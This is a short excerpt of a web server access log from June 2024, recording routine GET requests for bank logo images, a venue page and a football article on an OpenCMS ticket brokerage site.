94.23.203.202 - - [30/Jun/2024:00:14:24 +0200] "GET /ticket2/opencms/de/fi/venue/?venueid=912F0069-B2C0-0AC0-F2EF-4265D10E9B2C HTTP/1.1" 404 -
47.128.38.175 - - [30/Jun/2024:00:14:24 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_4_seb.png HTTP/1.1" 200 2487
47.128.38.175 - - [30/Jun/2024:00:14:24 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_1_nordea.png HTTP/1.1" 200 4807
47.128.38.175 - - [30/Jun/2024:00:14:25 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_3_swedbank.png HTTP/1.1" 200 5740
47.128.38.175 - - [30/Jun/2024:00:14:25 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_5_visa_mastercard.png HTTP/1.1" 200 8196
47.128.38.175 - - [30/Jun/2024:00:14:25 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_6_american_express.png HTTP/1.1" 200 5570
47.128.122.87 - - [30/Jun/2024:00:14:25 +0200] "GET /ticket2/opencms/sv/magazine/article?title=manchester-united-vs-arsenal HTTP/1.1" 200 76124
47.128.122.87 - - [30/Jun/2024:00:14:25 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/logo-new.png HTTP/1.1" 200 13541
47.128.122.87 - - [30/Jun/2024:00:14:26 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_2_handelsbanken.png HTTP/1.1" 200 4509
47.128.122.87 - - [30/Jun/2024:00:14:26 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_3_swedbank.png HTTP/1.1" 200 5740
